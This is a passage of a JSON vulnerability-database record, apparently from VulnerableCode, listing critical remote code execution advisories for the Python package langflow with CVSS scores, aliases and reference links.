                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33017"
                },
                {
                    "reference_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017"
                },
                {
                    "reference_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017"
                },
                {
                    "reference_url": "https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7",
                    "reference_id": "GHSA-rvqx-wpfh-mfx7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Act",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/"
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vwmf-pq79-vjvx",
                    "reference_id": "GHSA-vwmf-pq79-vjvx",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-vwmf-pq79-vjvx"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2026-33017",
                "GHSA-vwmf-pq79-vjvx"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zqwj-45w7-7kft"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57082?format=api",
            "vulnerability_id": "VCID-ztx2-wefa-c7bk",
            "summary": "Duplicate Advisory: Langflow Vulnerable to Code Injection via the `/api/v1/validate/code` endpoint\n### Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-rvqx-wpfh-mfx7. This link is maintained to preserve external references.\n\n### Original Description\n\nLangflow versions prior to 1.3.0 are susceptible to code injection in the `/api/v1/validate/code` endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.",
            "references": [
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/pull/6911",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/pull/6911"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/releases/tag/1.3.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/releases/tag/1.3.0"
                },
                {
                    "reference_url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3248",
                    "reference_id": "CVE-2025-3248",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3248"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c995-4fw3-j39m",
                    "reference_id": "GHSA-c995-4fw3-j39m",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-c995-4fw3-j39m"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/44832?format=api",
                    "purl": "pkg:pypi/langflow@1.3.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1dek-kvzf-27d1"
                        },
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-bb6r-1f6u-t7ed"
                        },
                        {
                            "vulnerability": "VCID-fc5h-qc2t-xqc3"
                        },
                        {
                            "vulnerability": "VCID-ncvf-vzqr-uydz"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-qwtw-q92t-quhz"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-sbea-kkfu-akgb"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-ysnc-jyxb-6qcy"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.3.0"
                }
            ],
            "aliases": [
                "GHSA-c995-4fw3-j39m"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ztx2-wefa-c7bk"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": "10.0",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@0.1.0"
}